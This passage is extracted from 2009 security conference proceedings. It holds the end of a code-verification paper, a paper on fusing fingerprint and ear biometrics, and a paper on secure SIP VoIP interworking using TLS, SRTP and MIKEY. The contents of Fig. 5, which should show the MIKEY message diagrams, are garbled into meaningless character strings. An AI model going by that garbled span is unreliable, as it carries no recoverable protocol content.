7. for each conditions condv in δv : 8. if condv adapt to current state of automaton then perform the actions actv in δv else goto 3) 9. if actv act on stack then perform push or pop operation according to the value of zv , 10. if actv act on variables then perform assignment operation according to the value of varv 11. invoke δ(), push qv = δ(qv ) into stateQ 12. let zv = current state of stack let varv = current state of variable, push them into stackQ and varQ. 13. if stateQ then return an empty path, else goto 3)

6

Future Work

There is still much space for further research. For the interactive part that shows the result of verification, it is desirable to offer users comprehensible description of the conflicts when a model is against some policies, and such detailed information of verification may help users refine or choose security policies. The refinement may involve two approaches: (1) Horizontal classification of policies, that is to choose a proper set of policies according to the function or other property of the program; (2) Vertical classification of policies, that is to find some function mapping conflicts to different alarm levels and accordingly choose different set of policies. Besides, content and organization of the rule base of security policies still need much study, as it largely determines the quality of protection that can be provided and the efficiency of verification.

References 1. Sekar, R., Venkatakrishnan, V.N., Basu, S., Bhatkar, S., DuVarney, D.C.: ModelCarrying Code: A Practical Approach for Safe Execution of Untrusted Applications. In: Proceedings of the nineteenth ACM symposium on Operating systems principles, pp. 15–28. ACM, New York (2003) 2. Giffin, J.T.: Model-based Intrusion Detection System Design And Evaluation, PhD thesis. University of Wisconsin-Madison (2006) 3. Necula, G.: Proof-Carry Code. In: ACM Symposium Principles of Programming Languages, POPL (1997) 4. Uppuluri, P.: Intrusion Detection/Prevention Using Behavior Specifications. PhD thesis, Stony Brook University (2003) 5. Hallaraker, O., Vigna, G.: Detecting Malicious JavaScript Code in Mozilla. In: Proceedings of 10th IEEE International Conference on Engineering of Complex Computer Systems, ICECCS 2005, pp. 85–94 (2005) 6. Cohen, S., Franco, R.: ActiveX Security: Improvements and Best Practices. MSDN (2006)

156

Y. Wei et al.

7. Wagner, D., Soto, P.: Mimicry Attacks on Host-based Intrusion Detection Systems. In: 9th ACM Conference on Computer and Communication Security (CCS), Washington, DC (2002) 8. Laurikari, V.: NFAs with Tagged Transitions, their Conversion to Deterministic Automata and Application to Regular Expressions. In: Proc. of the Seventh Intl. Symp.on String Processing and Information Retrieval (SPIRE 2000), pp. 181–187. IEEE, Los Alamitos (2000) 9. Kotz, D., Gray, R.S.: Mobile Agents and the Future of the Internet. Operating Systems Review 33, 7–13 (1999)

Feature Level Fusion of Biometrics Cues: Human Identification with Doddington’s Caricature Dakshina Ranjan Kisku1, Phalguni Gupta2, and Jamuna Kanta Sing3 1 Department of Computer Science and Engineering, Dr. B.C. Roy Engineering College, Durgapur – 713206, India 2 Department of Computer Science and Engineering, Indian Institute of Technology Kanpur, Kanpur – 208016, India 3 Department of Computer Science and Engineering, Jadavpur University, Kolkata – 700032, India {drkisku, jksing}@ieee.org, [email protected]

Abstract. This paper presents a multimodal biometric system of fingerprint and ear biometrics. Scale Invariant Feature Transform (SIFT) descriptor based feature sets extracted from fingerprint and ear are fused. The fused set is encoded by K-medoids partitioning approach with less number of feature points in the set. K-medoids partition the whole dataset into clusters to minimize the error between data points belonging to the clusters and its center. Reduced feature set is used to match between two biometric sets. Matching scores are generated using wolf-lamb user-dependent feature weighting scheme introduced by Doddington. The technique is tested to exhibit its robust performance. Keywords: Multimodal Biometrics, K-Medoids, Doddington’s Concept.

Fingerprint,

Ear,

SIFT Features,

1 Introduction The multimodal biometric systems [1] are found to be extremely useful and exhibit robust performance over the unimodal biometric systems in terms of several constraints. The aim of any multimodal system [1] is to acquire multiple sources of information from different modalities and minimize the error prone effect of monomodal systems. The focus to multimodal systems is the fusion of various biometric modality data at the various information fusion levels [2] such as sensor, feature extraction, matching score, rank or decision levels. In [1], [9] there exist multimodal biometrics systems based on face and fingerprint, face and voice, signature and voice, face and ear. However, the existence of any system through fusion of fingerprint [4] and ear [3] biometrics at feature extraction level is not known to the authors. Since, the fingerprint biometrics is widely used and the accuracy level of fingerprint system is high as compared to other biometric traits. Again, ear biometric is robust and effective to biometric applications. Further, ears [3] have several advantages over facial features such as uniform distributions of intensity and spatial resolution, and less variability with expressions and orientation of the face [5]. Unlike face recognition [5] with changing lightning and different pose of head D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 157–164, 2009. © Springer-Verlag Berlin Heidelberg 2009

158

D.R. Kisku, P. Gupta, and J.K. Sing

positions, ear shape does not change over time and ageing. Further low effect of lighting conditions and spatial distribution of pixels has made ear biometrics an emerging authentication system. Fingerprints are established themselves as widely used and efficient biometric traits for verifying individuals. Design of a reliable fingerprint verification system depends on underlying constraints such as representation of fingerprint patterns, sensing fingerprints and matching algorithms. This paper presents a robust feature level fusion technique of fingerprint [4] and ear [3] biometrics. It uses Scale Invariant Feature Transform (SIFT) descriptor [6] to obtain features from the normalized fingerprint and ear. These features are fused to get one feature vector. To obtain the more discriminative reduced set of feature vector, PAM (Partitioning About Medoids) characterized K-medoids clustering approach [7] is applied to the concatenated feature set. Matching scores between features of database set and that of query set are obtained by K-nearest neighbor approach [6] and Euclidean distance metric [2]. The relevance of individual matchers towards more efficient and robust performance is determined by wolf and lamb factors as discussed in [8]. Both these factors can decrease the performance of any biometric system by accepting more and more imposters as false accept. This paper extends the notions of Doddington's weighting scheme [8] in the proposed feature level fusion by adaptive user weighting process. The performance of feature level fusion has been determined on a multimodal database containing fingerprint and ear images. The results show significant improvements over the individual matching performance of fingerprint and ear biometrics as well as an existing feature level fusion scheme [2] which have used SIFT as feature descriptor. Next section introduces SIFT descriptor for feature extraction. Extraction of SIFT features from fingerprint and ear images and fusion by concatenation of extracted SIFT features is presented in Section 3. In Section 4, PAM characterized K-medoids clustering approach is applied to the concatenated feature set to handle the curse of dimensionality. A matching score generation technique using reduced features sets obtained from gallery and probe samples is also described in this section. Userdependent matcher weighting scheme using Doddington’s method with adaptive approach has been applied to the proposed feature level fusion in Section 5. Results have been analyzed in Section 6 and finally, concluding remarks are made in the last section.

2 Description of SIFT Features SIFT descriptor [2], [6] has been successfully used for general object detection and matching. SIFT operator can be able to detect stable and invariant feature points in images. It is invariant to image rotation, scaling, partly illumination changes, and 3D projective transform. SIFT descriptor detects feature points efficiently through a staged filtering approach that identifies stable points in the Gaussian scale-space. This is achieved by four steps: (i) selection of candidates for feature points by searching peaks in the scale- space from a difference of Gaussian (DoG) function, (ii) localization of these points by using the measurement of their stability, (iii) assignment of orientations based on local image properties, and finally, (iv) calculation of the feature descriptors which represent local shape distortions and illumination changes. These steps can determine candidate locations and a detailed

Feature Level Fusion of Biometrics Cues

159

fitting is performed to the nearby data for the candidate location, edge response and peak magnitude. To achieve invariance to image rotation, a consistent orientation is assigned to each feature point based on local image properties. Histogram of orientations is formed from the gradient orientation at all sample points within a circular window of a feature point. Peaks in this histogram correspond to the dominant directions of each feature point. For illumination invariance, 8 orientation planes are defined. Finally, the gradient magnitude and the orientation are smoothened by applying a Gaussian filter and then sampled over a 4×4 grid with 8 orientation planes. Each feature point [6] contains four types of information – spatial location (x, y), scale (s), orientation (θ) and keypoint descriptor (k). All these feature information are used. More formally, local image gradients are measured at the selected scale in the region around each keypoint. The measured gradients’ information is then transformed into a vector representation that contains a vector of 128 elements for each keypoints calculated over extracted keypoints. These keypoint descriptor vectors represent local shape distortions and illumination changes.

3 Feature Extraction and Feature Level Fusion 3.1 Preprocessing and SIFT Feature Extraction For fingerprint verification [4], three types of features are used: (i) global ridge and furrow structure forming a special pattern in the central region of the fingerprint, (ii) minutiae details associated with local ridge and furrow structure and (iii) correlation. However, minutiae based fingerprint systems [4] show higher accuracy as compared to other two types of systems. Local texture around minutiae points is more desirable and useful for good accuracy rather than the whole fingerprint image since global texture is sensitive to non-linear and non-repeatable deformation of such images. In the proposed method, SIFT features are extracted from the whole fingerprint image. On the other hand, ear biometric [3] has been newly introduced for identity verification and it is considered as one of the most reliable and invariant biometrics characteristics. SIFT descriptor is used to detect stable invariant points for general object recognition and it does not require generally any image to be preprocessed. However, in the proposed work, few preprocessing operations are performed on ear image to obtain better accuracy. In the first step, localization of ear image is done by detecting manually two points on ear image viz. Triangular Fossa and Antitragus [9]. Localization technique proposed in [9] has been used in this paper. In the next step fingerprint and ear images are normalized having adjustable gray level distribution. To make uniform distribution of gray levels, image intensity is measured in the central area and the distribution is adjusted accordingly. This is performed using adaptive histogram equalization technique. The proposed work uses the whole ear image for SIFT features extraction by making indifference it with the fingerprint texture. The use of SIFT descriptor not only increases the number of invariant SIFT points while feature extraction, but also increases the reliability of system by accumulating large number of points. Extraction of SIFT feature points can be controlled by local minima or maxima in a Gaussian scale space. The feature numbers can also be controlled by a set of parameters such as octaves and scales.

160

D.R. Kisku, P. Gupta, and J.K. Sing

(a) Minutiae Points

(b) SIFT Feature Points

Fig. 1. Minutiae and SIFT Feature Points of a Fingerprint

(a) Ear image

(b) Detection of SIFT points (c) SIFT points extraction

Fig. 2. SIFT Feature Points of an Ear Image

A fingerprint may contain thousand SIFT features. Figure 1 shows a typical fingerprint image from where 30 minutiae points and 2449 SIFT feature points have been detected. The number of SIFT feature points obtained from an ear may vary from hundreds to few thousands. An ear image is shown in Figure 2 from where 1154 SIFT feature points are extracted. 3.2 Feature Level Fusion of SIFT Keypoints Concatenation technique [2] is used to fuse SIFT features extracted from fingerprint and ear at the feature extraction level. Feature level fusion is difficult to achieve in practice because multiple modalities may have incompatible feature [1], [2] sets and the correspondence among different feature spaces may be unknown. The concatenated feature set exhibits better discrimination capability than the individual feature vectors obtained from fingerprint and ear biometrics separately.

Feature Level Fusion of Biometrics Cues

161

4 Feature Reduction and Matching 4.1 Feature Reduction PAM (Partitioning About Medoids) characterized K-medoids partitioning algorithm [7] is applied to the concatenated features set to obtain the reduced set of features which can provide more discriminative and meaningful reduced set of features. This clustering algorithm is an adaptive version of K-means clustering approach. It is used to partition dataset into some groups and minimizes the squared error between the points that belong to a cluster and a point designated as the center of the cluster. Kmedoids chooses data points as cluster centers (also called ‘medoids’). K-medoids clusters the dataset of n objects into k clusters. It is more robust to noise and outliers as compared to K-means clustering algorithm [7]. In the proposed method, K-medoids clustering algorithm is applied to the SIFT points set, which is formed by concatenation of SIFT features extracted from fingerprint and ear images. The redundant features are removed using K-medoids clustering technique and choosing the most proximate features as the representative of the set of similar features. A medoid can be defined as the object of a cluster, which means dissimilarity to all the objects in the cluster is minimal. The most generalization of K-medoids algorithm is the Partitioning Around Medoids (PAM) algorithm which can be given below. Step 1: Randomly select k number of points from the concatenated SIFT points set as the medoids. Step 2: Assign each SIFT feature point to the closest medoid and the closest medoid can be defined using a distance metric (Euclidean distance metric). Step 3: for each medoid i, i = 1, 2…k for each non-medoid SIFT point j swap i and j and compute the total cost of the configuration Step 4: Select the configuration with the lowest cost Step 5: Repeat Step 1 to Step 5 until there is no change in the medoid. 4.2 Matching The optimal features are matched using the K-nearest neighbor approach [6] by computing distances from the optimal feature vector obtained from probe samples to all stored optimal features which are obtained from gallery sample and k – closest samples are selected. In the proposed experiment, by using K-NN, a set of best matched features are selected. This computation is made using spatial location (x, y), scale (s), orientation (θ) and keypoint descriptor (k) information of SIFT descriptor. Euclidean distance is used for distance computation. The number of best matched features denotes the matching score for a particular fingerprint-ear pair sample. The matching scores are normalized in the range [0-1] [1], [8].

5 Adaptive Weighting Using Doddington’s Approach Reliability of each fused matching score can be increased by applying the proposed adaptive Doddington’s user-dependent user weighting scheme [8]. In order to

162

D.R. Kisku, P. Gupta, and J.K. Sing

decrease the number of false accepts in the proposed system, we extend the notion used for weighting the matchers by wolf-lamb concept introduced by Doddington. The authors in [8] have also used the Doddington’s concept for user weighting by weights the matchers in the fused biometric system. In the proposed system, we have computed the adaptive weights by making tan-hyperbolic weight for each matcher by assigning weights to individual matching scores. The proposed adaptive weighting scheme decreases the effect of imposter users rapidly while it is compared with the method discussed in [8]. The modified Doddington’s scheme is described as follows. Let the user-dependent fused match score for user p can be calculated as

fs p =

MS

∑w

ms p

n ms p , ∀p

(1)

ms =1

where MS denotes the total number of matching scores obtained from matching of probe and gallery samples and matching score

w ms p represents the weight that can be assigned to the

n ms p for user p. It is assumed that the fused scores carry the wolf-lamb

properties together which are not easy to determine separately. Assumptions have been made by Doddington’s [8] that the users who are labeled as lambs can be imitated easily and wolves can imitate other users. Lambs and wolves – these two constraints can lead to false accepts while they degrade the performance of biometric systems. After computing weight

w ms p for each matcher, we extend the notions for

each weight to make it adaptive one. The adaptive weight notion can be obtained by taking tan-hyperbolic of computed weights. The range of

w ms p weight must be [0,1]

and the sum of all weights should be 1. The objective of this adaptive weighting scheme is to reduce the lambness of matchers while feature level fusion of two or more biometric traits is formulated. The adaptive weight notation has been established by extending the usual notions used by [8] and by adopting the robust statistics method [8] as follows. MS ms W (w'1p , w' 2p ,..., w' ms p ,..., w' p ) = tanh(w p )

(2)

Now the Equation (1) can be re-written using Equation (2) as

fs p =

MS

∑ w'

ms p

n ms p , ∀p

(3)

ms =1

6 Experimental Results The proposed technique is tested on IIT Kanpur multimodal database consisting of fingerprint and ear images acquired from 1550 subjects and each subject has provided 2 fingerprints and 2 ear images. Fingerprint images are acquired using an optical sensor at 500 dpi and the ear images are obtained using a high resolution digital camera. After normalization of fingerprint and ear images, fingerprint images are

Feature Level Fusion of Biometrics Cues

163

< ---Ide ntific a tio n P r o ba bility (C M C )--->

Cumulative Match Characteristics Curve 1 0.99 0.98 0.97 0.96 0.95 Ear Identification Feature Level Multimodal Identification Fingerprint Identification

0.94 0.93 0.92 5

10

15

20

25

30

35

40

45

50

<--- Rank (k) --->

Fig. 3. Cumulative Match Characteristics Curves

downscaled to 200×200 pixels. This high resolution to fingerprint image may increase the number of SIFT features. On the other hand, the ear images are taken under controlled environment in different sessions. The ear viewpoints are consistently kept neutral and the ear images are downscaled to 200×140 pixels. The following protocol has been established for multimodal evaluation and testing. Training: One image per person from each modality i.e., fingerprint and ear is used enrollment in gallery database and which are further used for feature extraction and feature level fusion. Fused feature vector is then encoded and is saved as gallery vector and is used for identification and verification. Testing: Pair of fingerprint and ear images is used for testing. Imposter matching scores are generated by validating and testing the first client against itself and also against the remaining subjects. Fused feature vector is generated from a pair of fingerprint and ear images and is compared with the gallery feature vectors. Rank based method is adopted for exhibit the overall performance of the proposed feature level fusion. Matching is performed between a probe fused vector with itself encoded in the database and also with the rest of the encoded fused vectors in the database. The proposed multimodal system is able to identify the specific person from the entire database and ranks are found in terms matching probability obtained. The subjects are retrieved from database according to matching scores. The identification rate for the proposed system is obtained as 98.71% while that for fingerprint and ear biometrics are found to be 95.02% and 93.63% respectively, as shown in Figure 3.

7 Conclusion This paper has presented a feature level fusion technique of fingerprint and ear biometrics for human identification. The technique has used SIFT descriptor for

164

D.R. Kisku, P. Gupta, and J.K. Sing

invariant features extraction from fingerprint and ear modalities and PAM characterized K-medoids algorithm for feature reduction. The reduced feature set reflects higher matching proximity with relevant information. Doddington’s userdependent weighting scheme has been adopted by extending the existing notions using adaptive weighting applied to the matching scores. The performance of the technique has been determined on a multimodal database containing fingerprint and ear images. The results show significant improvements on identification performance over the fingerprint and ear biometrics as well as the existing feature level fusion scheme [2] which have used SIFT as feature descriptor. The technique not only attains higher accuracy, but also reflects robustness towards identification of individuals.

References 1. Ross, A., Nandakumar, K., Jain, A.K.: Handbook of Multibiometrics. Springer, Heidelberg (2006) 2. Rattani, A., Kisku, D.R., Bicego, M., Tistarelli, M.: Robust Feature-Level Multibiometrics Classification. In: IEEE Biometric Consortium Conference, Biometrics Symposium, pp. 1– 6 (2006) 3. Bustard, J.D., Nixon, M.S.: Robust 2D Ear Registration and Recognition based on SIFT Point Matching. In: International Conference on Biometrics: Theory, Applications, and Systems (2008) 4. Maltoni, D., Maio, D., Jain, A.K., Prabhakar, S.: Handbook of Fingerprint Recognition, 2nd edn. Springer, Heidelberg (2009) 5. Li, S.Z., Jain, A.K. (eds.): Handbook of Face Recognition. Springer, Heidelberg (2005) 6. Lowe, D.G.: Object recognition from local scale-invariant features. In: International Conference on Computer Vision, pp. 1150–1157 (1999) 7. Kaufman, L., Rousseeuw, P.J.: Finding Groups in Data: An Introduction to Cluster Analysis. Wiley, New York (1990) 8. Snelick, R., Uludag, U., Mink, A., Indovina, M., Jain, A.: Large Scale Evaluation of Multimodal Biometric Authentication Using State-of-the-Art Systems. IEEE Transactions on Pattern Analysis and Machine Intelligence 27(3), 450–455 (2005) 9. Chang, K., Bowyer, K.W., Sarkar, S.: Comparison and Combination of Ear and Face Images in Appearance-based Biometrics. Transaction on PAMI 25(9) (2003)

A Study on the Interworking for SIP-Based Secure VoIP Communication with Security Protocols in the Heterogeneous Network Seokung Yoon1, Hyuncheol Jung1, and Kyung-Seok Lee2 1

Korea Internet & Security Agency IT Venture Tower, Jungdaero 135, Songpa-gu, Seoul, Korea 138-950 {seokung, hcjung}@kisa.or.kr 2 Dept of Computer Science, Graduate School of Soongsil Univ. 511 Sangdo-dong, Dongjak-gu, Seoul, Korea 156-743 [email protected]

Abstract. VoIP will become more and more popular around the world but security vulnerabilities such as eavesdropping, learning private information could be in the way of VoIP revitalization. It is necessary to protect signaling and media information in the whole path. In the real world it is not easy to provide end-to-end secure VoIP communication because of the heterogeneous network. In this situation we have to consider network interworking between SIP-based VoIP and PSTN or Mobile. This paper analyzes interworking scenarios for secure communication and proposes the method to provide secure communication with security protocols such as TLS, SRTP and MIKEY in the heterogeneous network. Keywords: VoIP, OPTIONS Method, MIKEY, Heterogeneous Network.

1 Introduction VoIP (Voice over Internet Protocol) is poised to take over from the century-old public switched telephone network (PSTN). Numerous protocols have been authored that carry various forms of real-time multimedia session data such as voice, video, or text message. The SIP (Session Initiation Protocol) [1] is a standard protocol of IETF and works in concert with these protocols. VoIP, as it is known, has security vulnerabilities such as eavesdropping, Denial of Service (DoS), service abuse, session hijacking, VoIP spam. Especially, eavesdropping is a major issue to solve urgently. SIP-based VoIP specifies security mechanisms to protect user privacy from eavesdropping. HTTP digest [2] provides user-to-user and user-to-proxy authentication. TLS [3] provides integrity and confidentiality of SIP signaling messages. SRTP (Secure Real-time Transport Protocol) [4] provides a framework for encryption and message authentication of RTP streams. MIKEY [5] has been proposed as a key management protocol for multimedia data encryption in IETF, considered as a key management protocol for SRTP. The MIKEY protects a master key with the pre-shared key or the responder’s public key. To use the MIKEY for D. Ślęzak et al. (Eds.): SecTech 2009, CCIS 58, pp. 165–175, 2009. © Springer-Verlag Berlin Heidelberg 2009

166

S. Yoon, H. Jung, and K.-S. Lee

exchanging a master key, it is important to know to whom initiator speak. Also, initiator have to know whether responder support security protocols or not. But in case of heterogeneous network, it is not easy to know responder capability because there are legacy devices or devices which adopt different security protocols. In this situation initiator could not carry out secure communication because he does not know responder capability. This situation could leads to security vulnerabilities therefore it should be addressed. This paper analyzes the security mechanism to negotiate SIP signaling security and MIKEY as a key management protocol for multimedia data encryption. This paper also analyzes interworking scenarios for secure communication and proposes the method to provide secure communication with security protocols such as TLS, SRTP and MIKEY in the heterogeneous network. With this study, we will protect the SIP-based VoIP with MIKEY in the heterogeneous network.

2 SIP-Based Secure VoIP Communication Fig.1. shows SIP-based secure VoIP communication flow. The procedures for SIPbased secure VoIP communication are as follows. Firstly, the security mechanism negotiation to protect SIP signaling message is executed sequentially using OPTIONS method between IP phone and SIP proxy, SIP proxies, and SIP proxy and IP phone. After the security mechanism negotiation, each entity builds up TLS session. Secondly, the sender starts call setup with INVITE message containing the master key derived from MIKEY to encrypt and authenticate media traffic. Finally, a secure media channel (SRTP) is created.

Fig. 1. SIP-based VoIP secure communication flow

A Study on the Interworking for SIP-Based Secure VoIP Communication

167

3 OPTIONS Method (RFC3329) 3.1 Overview of Operation For carrying out a secure communication, it is necessary to negotiate security protocols. IETF recommends OPTIONS [6] method to support it. Fig.2. illustrates how the mechanism works.

Fig. 2. Security agreement message flow

Step 1: Clients wishing to use this specification can send a list of their supported security mechanisms along the first request to the server. Step 2: Servers wishing to use this specification can challenge the client to perform the security agreement procedure. The security mechanisms and parameters supported by the server are sent along in this challenge. Step 3: The client then proceeds to select the highest-preference security mechanism they have in common and to turn on the selected security. Step 4: The client contacts the server again, now using the selected security mechanism. The server's list of supported security mechanisms is returned as a response to the challenge. Step 5: The server verifies its own list of security mechanisms in order to ensure that the original list had not been modified. 3.2 Client Initiated Fig.3. illustrates that UA negotiates the security mechanism to be used with its server without knowing beforehand which mechanisms the proxy supports. The OPTIONS method can be used here to request the security capabilities of the server. In this way, the security can be initiated even before the first INVITE is sent via the server. Fig.4. illustrates the example of OPTIONS message.

168

S. Yoon, H. Jung, and K.-S. Lee

Fig. 3. Negotiation Initiated by the Client

(1) OPTIONS sip:proxy.example.com SIP/2.0 Security-Client: tls Security-Client: digest Require: sec-agree Proxy-Require: sec-agree (2) 494 Security Agreement Required Security-Server: ipsec-ike;q=0.1 Security-Server: tls;q=0.2 (3) INVITE sip:proxy.example.com SIP/2.0 Security-Verify: ipsec-ike;q=0.1 Security-Verify: tls;q=0.2 Route: sip:[email protected] Require: sec-agree Proxy-Require: sec-agree Fig. 4. OPTIONS message example

The UAC sends an OPTIONS request to its server, indicating at the same time that it is able to negotiate security mechanisms and that it supports TLS and HTTP Digest. The server responds to the UAC with its own list of security mechanisms - IPsec and TLS. The only common security mechanism is TLS, so they establish a TLS connection between them. When the connection is successfully established, the UAC sends an INVITE request over the TLS connection just established. This INVITE contains the server's security list. The server verifies it, and since it matches its static list, it processes the INVITE and forwards it to the next hop.

A Study on the Interworking for SIP-Based Secure VoIP Communication

169

4 MIKEY (RFC3830) 4.1 System Overview One objective of MIKEY is to produce a Data Security Association (Data SA) for the security protocol, including a Traffic-Encrypting Key (TEK), which is derived from a TEK Generation Key (TGK), and used as input for the security protocol. MIKEY supports the possibility of establishing keys and parameters for more than one security protocol (or for several instances of the same security protocol) at the same time. The concept of Crypto Session Bundle (CSB) is used to denote a collection of one or more Crypto Sessions that can have common TGK and security parameters, but which obtain distinct TEKs from MIKEY. 4.2 Basic Key Transport and Exchange Methods The MIKEY define three different methods of transporting/establishing a TGK: with the use of a pre-shared key, public-key encryption, and Diffie-Hellman (DH) key exchange. The pre-shared key method and the public-key method are both based on key transport mechanisms, where the actual TGK is pushed (securely) to the recipient(s). In the Diffie-Hellman method, the actual TGK is instead derived from the Diffie-Hellman values exchanged between the peers. The following general notation is used: - HDR: The general MIKEY header, which includes MIKEY CSB related data and information mapping to the specific security protocol used. - T: The timestamp, used mainly to prevent replay attacks. - IDx: The identity of entity x (IDi=Initiator, IDr=Responder). - RAND: Random/pseudo-random byte-string, which is always included in the first message from the Initiator. - SP: The security policies for the data security protocol. 4.2.1 Pre-Shared Key (PSK) In this method, the pre-shared secret key, s, is used to derive key material for both the encryption (encr_key) and the integrity protection (auth_key) of the MIKEY messages. As shown in Fig. 5(a), the main objective of the Initiator's message (I_MESSAGE) is to transport one or more TGKs (carried into KEMAC) and a set of security parameters (SPs) to the Responder in a secure manner. As the verification message from the Responder is optional, the Initiator indicates in the HDR whether it requires a verification message or not from the Responder. KEMAC = E(encr_key, {TGK}) || MAC

(1)

The KEMAC payload contains a set of encrypted sub-payloads and a MAC. Each sub-payload includes a TGK randomly and independently chosen by the Initiator. The MAC is a Message Authentication Code covering the entire MIKEY message using

170

S. Yoon, H. Jung, and K.-S. Lee

the authentication key, auth_key. The main objective of the verification message from the Responder is to obtain mutual authentication. The verification message, V, is a MAC computed over the Responder's entire message, the timestamp and the two party identities, using the authentication key. 4.2.2 Public-Key Encryption (PKE) As in the previous case, the main objective of the Initiator's message is to transport one or more TGKs and a set of security parameters to the Responder in a secure manner with Fig. 5(b). This is done using an envelope approach where the TGKs are encrypted with keys derived from a randomly/pseudo-randomly chosen "envelope key". The envelope key is sent to the Responder encrypted with the public key of the Responder. The PKE contains the encrypted envelope key: PKE = E(PKr, env_key). It is encrypted using the Responder's public key (PKr). If the Responder possesses several public keys, the Initiator can indicate the key used in the CHASH payload. The KEMAC contains a set of encrypted sub-payloads and a MAC: KEMAC = E(encr_key, IDi || {TGK}) || MAC

(2)

The first payload (IDi) in KEMAC is the identity of the Initiator. Each of the following payloads (TGK) includes a TGK randomly and independently chosen by the Initiator. The encrypted part is then followed by a MAC, which is calculated over the KEMAC payload. The encr_key and the auth_key are derived from the envelope key. The SIGNi is a signature covering the entire MIKEY message, using the Initiator's signature key. The main objective of the verification message from the Responder is to obtain mutual authentication. As the verification message V from the Responder is optional, the Initiator indicates in the HDR whether it requires a verification message or not from the Responder. V is calculated in the same way as in the pre-shared key mode. 4.2.3 Diffie-Hellman (D-H) Key Exchange This method creates a DH-key, which is used as the TGK. This method cannot be used to create group keys; it can only be used to create single peer-to-peer keys. The main objective of the Initiator's message is to, in a secure way, provide the Responder with its DH value (DHi) g^(xi), where xi MUST be randomly/pseudo-randomly and secretly chosen, and a set of security protocol parameters with Fig. 5(c). The SIGNi is a signature covering the Initiator's MIKEY message, I_MESSAGE, using the Initiator's signature key. The main objective of the Responder's message is to, in a secure way, provide the Initiator with the Responder's value (DHr) g^(xr), where xr MUST be randomly/pseudo-randomly and secretly chosen. The timestamp that is included in the answer is the same as the one included in the Initiator's message. The SIGNr is a signature covering the Responder's MIKEY message, R_MESSAGE, using the Responder's signature key. The DH group parameters are chosen by the Initiator and signaled to the Responder. Both parties calculate the TGK, g^(xi*xr) from the exchanged DH-values.

A Study on the Interworking for SIP-Based Secure VoIP Communication

171

FYgdcbXYf          FSA9GG5;91      <8F H O=8fQ J

=b]h]Uhcf     =SA9GG5;91     <8F H F5B8 O=8]Q   O=8fQ oGDq ?9A57

(a) =b]h]Uhcf     =SA9GG5;91     <8F H F5B8 O=8]p79FH]Q O=8fQ     oGDq ?9A57 O7<5G
FYgdcbXYf          FSA9GG5;91      <8F H O=8fQ J

(b) FYgdcbXYf          FSA9GG5;91      <8F H O=8fp79FHfQ =8]      8
=b]h]Uhcf     =SA9GG5;91     <8F H F5B8 O=8]p79FH]Q   O=8fQ oGDq 8<] G=;B]

(c) Fig. 5. The MIKEY message (a) PSK (b) PKE (c) D-H key exchange

5 Secure Communication Interworking Scenarios In this study, heterogeneous network means VoIP network interconnected via the PSTN or mobile network. With heterogeneous network, SIP-based VoIP gateway has to provide functions to handle SIP messages. The scope of secure communication could be decided using OPTIONS and its response messages. (1) If terminal or gateway supports OPTIONS method and security protocols, the response message is 494. (2) If terminal or gateway only supports OPTIONS method not security protocols, the response message is 488. (3) If terminal or gateway does not support OPTIONS method and security protocols, the response message is 200 or other values.

172

S. Yoon, H. Jung, and K.-S. Lee

In case of (2) and (3), we assume terminal or gateway of next hop does not have security protocols. In this situation, initiator has to create MIKEY message with gateway of previous hop and carry out secure communication with it. The following scenarios use TLS for SIP signaling security and SRTP for multimedia data encryption. 5.1 Partial Secure Communication

Ⅰ

Fig.6. illustrates partial secure communication scenario that responder terminal does not support security protocol or PSTN, and other entities support security protocol. Gray-painted part means PSTN interconnected VoIP network. In this scenario, each entity sends OPTIONS messages to next hop and returns 494 response messages to previous hop at the same time. But PSTN returns 200 OK message or error message when receiving OPTIONS message. Initiator would know the scope of secure communication with response messages, and creates MIKEY message using preshared key or public key of gateway. Gateway in the responder network has interworking functions to encrypt or decrypt the messages for supporting this scenario.

Fig. 6. Partial secure communication between initiator and gateway

5.2 Partial Secure Communication

Ⅱ

Fig.7. illustrates partial secure communication scenario that initiator terminal does not support security protocol or PSTN and remains support security protocol. With this scenario, gateway in the initiator network has to create OPTIONS message and send it to the next hop. Gateway would know the scope of secure communication with response messages, and creates MIKEY message using pre-shared key or public key of responder.

A Study on the Interworking for SIP-Based Secure VoIP Communication

Fig. 7. Partial secure communication between gateway and receiver terminal

Fig. 8. Partial secure communication between gateways

173

174

S. Yoon, H. Jung, and K.-S. Lee

5.3 Partial Secure Communication

Ⅲ

Fig.8. illustrates partial secure communication scenario that initiator and responder terminals do not support security protocol or PSTN and remains support security protocol. Most enterprises use VoIP services like this scenario. To protect relatively vulnerable internet area, secure communication should me provided between gateways. Gateway in the initiator network has to create OPTIONS message and send it to the next hop. With the result that, Gateway would know the scope of secure communication with response messages, and creates MIKEY message using preshared key or public key of gateway in the responder network.

6 Conclusion Due to VoIP vulnerabilities such as eavesdropping, learning private information, it is necessary to protect signaling and media information. But in the real world, it is not easy to provide end-to-end secure VoIP communication because of the heterogeneous network. In this situation we have to consider network interworking between SIPbased VoIP and PSTN or Mobile. This paper analyzes the security mechanism to negotiate SIP signaling security and MIKEY as a key management protocol for multimedia data encryption. This paper also analyzes interworking scenarios for secure communication and proposes the method to provide secure communication with security protocols such as TLS, SRTP and MIKEY in the heterogeneous network. With this study, we will protect the SIPbased VoIP with MIKEY in the heterogeneous network. We implement security protocols such as TLS, SRTP, MIKEY into terminal, proxy and gateway and verify above mentioned scenarios in the experiment network interconnected VoIP service network. And we find no issues regarding these scenarios. Acknowledgments. This work was supported by the IT R&D program of MKE/KEIT. [2008-S-028-02, The Development of SIP-Aware Intrusion Prevention Technique for protecting SIP-base Application Services].

References [1] Rosenberg, J., Schulzrinne, H., Camaillo, G., Johnston, A., Sparks, R., Handly, M., Schooler, E.: SIP: Session Initiation Protocol, RFC 3261, Internet Engineering Task Force (June 2002) [2] Franks, J., Hallam-Baker, P., Hostetler, J., Lawrance, S., Leach, P., Luotonen, A., Stewart, L.: HTTP Authentication: Basic and Digest Access Authentication, Internet Engineering Task Force (June 1999) [3] Dierks, T., Allen, C.: The TLS Protocol version 1.0, RFC 2246, Internet Engineering Task Force (January 1999)

A Study on the Interworking for SIP-Based Secure VoIP Communication

175

